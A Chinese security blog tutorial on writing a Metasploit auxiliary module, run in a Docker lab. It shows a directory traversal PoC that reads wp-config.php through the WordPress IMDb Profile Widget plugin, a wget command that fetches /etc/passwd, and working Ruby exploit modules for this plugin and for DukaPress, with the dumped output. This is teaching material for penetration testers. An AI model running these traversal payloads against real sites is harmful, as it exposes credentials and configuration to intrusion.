工具分享
Metasploit module开发入门篇
0x00 概述
Metasploit——渗透测试神器,相信大家应该都用过或听过,drops里也有很多白帽子写过相关的文章,介绍如何使用Metasploit。使用过Metasploit的同学应该知道,Metasploit Framework是高度模块化的,即框架是由多个module组成,我们除了可以使用已有的 module,还可以自行编写module来满足自己的需求,模块化使得框架具有很好的可扩展性,这也是为什么Metasploit Framework这么受欢迎的原因之一。
看了看drops之前的文章,好像没人写过关于如何编写 Metasploit Module,刚好最近在捣鼓Metasploit,顺便复习下快遗忘的ruby,记录下自己学习的过程。
因为是入门篇,所以这里以一个非常简单WordPress Plugin的任意文件读取漏洞作为例子,搭建环境,编写自己的Auxiliary module(辅助模块),然后测试验证,介绍编写自己的 module的步骤和方法。
文中如果有说的不对或不准确的地方,欢迎大家指出~
0x01 漏洞环境
漏洞环境是一个WordPress 插件imdb-widget 1.0.8版本的任意文件读取漏洞,缺陷代码存在于pic.php,代码:
|
1 2 3 |
<?php header( 'Content-Type: image/jpeg' ); readfile( $_GET["url"] ); |
PoC:
|
1 |
/wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php |
因为 Content-Type 被设置成了 image/jpeg,所以访问后需要点击另存为文本文件,然后打开就可以获取到文件内容
可以参考WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion
0x02 环境搭建
环境搭建包括两部分
Metasploit
这里使用 Kali 2.0,自带Metasploit,比较方便,下载Prebuilt Kali Linux VirtualBox Images,导入VirtualBox就可以用,这里就不细说了
WordPress 插件漏洞环境
这里使用docker来搭建,操作系统为 Ubuntu 14.04,docker的安装大家可以 google下
拉取 WordPress image
|
1 |
docker pull wordpress:4.4.2 |
拉取 Mysql image
|
1 |
docker pull mysql:5.7.11 |
拉取过程可能会比较慢,可以装个Shadow(socks)和proxychains,再proxychains docker pull
启动 mysql container
|
1 |
docker run -d -p 3306:3306 --name mysql -e MYSQL_ROOT_PASSWORD=root mysql:5.7.11 |
启动 wordpress container
|
1 |
docker run -d --name wordpress --link mysql:mysql -p 80:80 wordpress:4.4.2 |
访问
|
1 |
http://127.0.0.1/ |
根据页面提示Install就行
接着登录后台
|
1 |
http://127.0.0.1/wp-login.php |
下载插件imdb-widget有漏洞的1.0.8版本,点击左边导航栏的 插件 - 安装插件 - 上传插件,选择刚才下载的zip包,点现在安装 - 启用插件
然后点击 外观 - 小工具,把左边的 IMDb Profile 拖到 挂件区域的第一个位置,点开设置User id,随便填一个如ur1,Show 随便勾选几个,点保存。主页刷新就可以看到了
测试漏洞,执行如下命令,就可以看到 /etc/passwd 的内容
|
1 2 3 4 |
wget -O result.txt http://127.0.0.1/wp-content/plugins/imdb-widget/pic.php?url=../../../../../../../../../etc/passwd cat result.txt ... |
0x03 编写Module
编写之前先简单介绍一些概念相关的东西
Metasploit中的 Module Tree 分为两种,Primary Module Tree 和 User-Specified Module Tree,前者用于放框架自带的module,后者用于放自己写的module.
Primary Module Tree在目录 /usr/share/metasploit-framework/modules/ 下
User-Specified Module Tree 在 ~/.msf7/modules/(官网写的是~/.msf4/modules/)
Module的分类包括6种:
|
1 2 3 4 5 6 |
drwxr-xr-x 20 root root 4.0K Jan 28 05:38 auxiliary drwxr-xr-x 11 root root 4.0K Jan 28 05:38 encoders drwxr-xr-x 18 root root 4.0K Jan 28 05:38 exploits drwxr-xr-x 9 root root 4.0K Jan 28 05:38 nops drwxr-xr-x 5 root root 4.0K Jan 28 05:38 payloads drwxr-xr-x 11 root root 4.0K Jan 28 05:38 post |
根据官网的介绍,翻译过来大概意思是:
auxiliary:辅助模块,不带有payload的exploit,比如一些扫描模块
payloads:远程运行的代码,比如反弹shell的代码
exploits:带有payload的exploit
encoders:用于对payload进行编码
nops:保持paload大小的一致性
post: 获取权限后,用于后续渗透阶段的模块
因为任意读取漏洞是用于获取信息的,并不能直接获取系统权限,即不带有 payload ,因此我们要编写的module是属于auxiliary分类下的。
编写之前,我们来分析下任意文件读取漏洞auxiliary module需要完成的功能,简单来说:
- 检查插件版本,看是否为存在漏洞的版本,如果不是,则返回invulnerable,如果是或不确定,比如获取不到版本信息,则执行2
- 向存在漏洞的页面发送http请求,获取某个指定文件的内容,如果获取成功,则保存文件到本地。如果获取失败,有两种可能性,一是插件不存在漏洞,对应前面获取不到版本信息的情况;二是文件不存在或文件的权限问题;需要根据返回做相应处理
注:这里检查插件是否存在,应该由另一个module来完成,这里只负责检测插件是否存在漏洞
分析完后,就得开始写module了,那么这里有两种方法:
- 找一个auxiliary module的代码skeleton,然后一点点自己写;
- 找一个类似的已经写好的module,在它的基础上改写;
这里推荐第二种,比较适合我这种新手,有参考,写起来也容易些,那么如何找到可以参考的module呢?莫慌~
打开msfconsole,因为是文件读取,可以先search wordpress然后再找 read 关键词,在msfconsole中执行
|
1 |
msf > grep "read" search wordpress |
找到如下几个module
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
auxiliary/scanner/http/wp_dukapress_file_read normal WordPress DukaPress Plugin File Read Vulnerability auxiliary/scanner/http/wp_gimedia_library_file_read normal WordPress GI-Media Library Plugin Directory Traversal Vulnerability auxiliary/scanner/http/wp_imdb_profile_widget_file_read normal WordPress IMDb Profile Widget Plugin File Read Vulnerability auxiliary/scanner/http/wp_mobileedition_file_read normal WordPress Mobile Edition File Read Vulnerability auxiliary/scanner/http/wp_nextgen_galley_file_read normal WordPress NextGEN Gallery Directory Read Vulnerability auxiliary/scanner/http/wp_simple_backup_file_read normal WordPress Simple Backup File Read Vulnerability auxiliary/scanner/http/wp_subscribe_comments_file_read normal WordPress Subscribe Comments File Read Vulnerability |
这里选择auxiliary/scanner/http/wp_dukapress_file_read,具体文件位于/usr/share/metasploit-framework/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb
代码如下:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress DukaPress Plugin File Read Vulnerability', 'Description' => %q{ This module exploits a directory traversal vulnerability in WordPress Plugin "DukaPress" version 2.5.2, allowing to read arbitrary files with the web server privileges. }, 'References' => [ ['EDB', '35346'], ['CVE', '2014-8799'], ['WPVDB', '7731'], ['OSVDB', '115130'] ], 'Author' => [ 'Kacper Szurek', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE )) register_options( [ OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) ], self.class) end def check check_plugin_version_from_readme('dukapress', '2.5.7') end def run_host(ip) traversal = "../" * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'), 'vars_get' => { 'src' => "#{traversal}#{filename}" } }) if res && res.code == 200 && res.body.length > 0 print_status('Downloading file...') print_line("\n#{res.body}") fname = datastore['FILEPATH'] path = store_loot( 'dukapress.file', 'text/plain', ip, res.body, fname ) print_good("#{peer} - File saved in: #{path}") else print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") end end end |
看到这一堆代码,一般人都会有点晕,不知道从那里下手,莫慌,问google,搜索metasploit write module,搜索结果第三个,How to get started with writing an exploit,里面有一些module结构的说明. 这里对照着给了代码加了些注释:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
# 引入msf core 库 require 'msf/core' # 继承 Msf::Auxiliary 类 class Metasploit3 < Msf::Auxiliary # 引入三个 module,具体可以查看文档 include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner # 初始化函数 def initialize(info = {}) super(update_info(info, # [Vendor] [Software] [Root Cause] [Vulnerability type] 'Name' => 'WordPress DukaPress Plugin File Read Vulnerability', # 描述 'Description' => %q{ This module exploits a directory traversal vulnerability in WordPress Plugin "DukaPress" version 2.5.2, allowing to read arbitrary files with the web server privileges. }, # 相关vulnerability 或 exploit的参考 'References' => [ ['EDB', '35346'], ['CVE', '2014-8799'], ['WPVDB', '7731'], ['OSVDB', '115130'] ], # 作者 'Author' => [ 'Kacper Szurek', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE )) # 注册需要参数 register_options( [ # 要获取的文件路径 OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), # 遍历深度,用于到达根目录,默认7次../ OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) ], self.class) end # 用于支持 check 命令;在具体执行exploit前,检查是否存在漏洞 def check # 检查dukapress版本,Wordpress module提供 check_plugin_version_from_readme('dukapress', '2.5.7') end def run_host(ip) traversal = "../" * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// # 发送http请求 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'), 'vars_get' => { 'src' => "#{traversal}#{filename}" } }) # 检查响应 if res && res.code == 200 && res.body.length > 0 print_status('Downloading file...') print_line("\n#{res.body}") fname = datastore['FILEPATH'] # 保存文件 path = store_loot( 'dukapress.file', 'text/plain', ip, res.body, fname ) print_good("#{peer} - File saved in: #{path}") else print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") end end end |
弄懂大概结构后,我们根据前面的分析,编写自己的module,完成后的代码如下
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 |
# This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework # # 引入msf core 库 require 'msf/core' # 继承 Msf::Auxiliary 类 class Metasploit3 < Msf::Auxiliary # 引入三个 module,照搬,具体可以查看文档 include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner # 初始化函数 def initialize(info = {}) super(update_info(info, # [Vendor] [Software] [Root Cause] [Vulnerability type] 'Name' => 'WordPress IMDb Profile Widget Plugin File Read Vulnerability', # 描述 'Description' => %q{ This module exploits a directory traversal vulnerability in WordPress Plugin "IMDb Profile Widget" version 1.0.8, allowing to read arbitrary files with the web server privileges. }, # 相关vulnerability 或 exploit的参考 'References' => [ ['URL', 'https://www.exploit-db.com/exploits/39621/'] ], # 作者 'Author' => [ 'CrashBandicot @DosPerl', # Vulnerability discovery 'blinking.yan <blinking.yan[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE )) # 注册需要参数 register_options( [ OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) ], self.class) end # 用于支持 check 命令;在具体执行exploit前,检查是否存在漏洞 def check # 检查imdb-widget版本 check_plugin_version_from_readme('imdb-widget', '1.0.8') end # 执行exploit def run_host(ip) traversal = "../" * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// # 发送读取文件的http请求 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'imdb-widget', 'pic.php'), 'vars_get' => { 'url' => "#{traversal}#{filename}" } }) # 检查响应 if res && res.code == 200 && res.body.length > 0 # 文件不存在 if res.body.include? 'No such file or directory' print_error("#{peer} - Nothing was downloaded. No such file or directory: /#{filename}. Please change the DEPTH parameter.") # 文件读取权限问题 elsif res.body.include? 'Permission denied' print_error("#{peer} - Nothing was downloaded. Permission denied: /#{filename}. Please change the DEPTH parameter.") else print_status('Downloading file...') print_line("\n#{res.body}") fname = datastore['FILEPATH'] # 保存文件 path = store_loot( 'imdb-widget.file', 'text/plain', ip, res.body, fname ) print_good("#{peer} - File saved in: #{path}") end else print_error("#{peer} - Http Response Code is not 200 or Plugin is not vulnerable") end end end |
可以看到,改动的地方并不是很多。
因此我们并不需要弄懂所有的类和方法,也可以写出自己的module。
代码中发送http请求部分可以参考:How to Send an HTTP Request Using HTTPClient
0x04 测试Module
前面提到,msf有专门的目录~/.msf7/modules/来存放自己编写的module,这里对照着auxiliary/scanner/http/wp_dukapress_file_read,创建目录
|
1 |
mkdir -p ~/.msf7/modules/auxiliary/scanner/http/ |
将代码保存~/.msf7/modules/auxiliary/scanner/http/目录下,文件名为wp_imdb_profile_widget_file_read.rb,重启msfconsole,加载自定义module,执行
|
1 |
msfconsole -m ~/.msf7/modules |
查看下插件是否已经被load
|
1 2 3 |
msf > grep "imdb" search wordpress auxiliary/scanner/http/wp_imdb_profile_widget_file_read normal WordPress IMDb Profile Widget Plugin File Read Vulnerability |
对前面的漏洞环境进行测试,这里wordpress的ip为192.168.1.191
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
msf > use auxiliary/scanner/http/wp_imdb_profile_widget_file_read msf auxiliary(wp_imdb_profile_widget_file_read) > show options Module options (auxiliary/scanner/http/wp_imdb_profile_widget_file_read): Name Current Setting Required Description --- DEPTH 7 yes Traversal Depth (to reach the root folder) FILEPATH /etc/passwd yes The path to the file to read Proxies no A proxy chain of format type:host:port,type:host:port RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port TARGETURI / yes The base path to the wordpress application THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(wp_imdb_profile_widget_file_read) > set rhosts 192.168.1.191 rhosts => 192.168.1.191 msf auxiliary(wp_imdb_profile_widget_file_read) > run [*] Downloading file... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false [+] 192.168.1.191:80 - File saved in: /root/.msf7/loot/20160403132842default192.168.1.191imdbwidget.file266865.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(wp_imdb_profile_widget_file_read) > |
成功读取到/etc/passwd,测试成功~
0x05 结论
文章主要介绍的是如何去编写module的方法,有的地方可能写的不是很详细。总结来说就是: 在接触一个新的东西时,参考别人已经写好的东西,然后修修改改,是一种很好快速入门的方法。
本文由 安全周 作者:SecJack 发表,转载请注明来源!
SecJack
文章:96游荡在网络当中的小白
相关文章
热评文章
最赞的文章
发表评论
您必须[登录] 才能发表留言!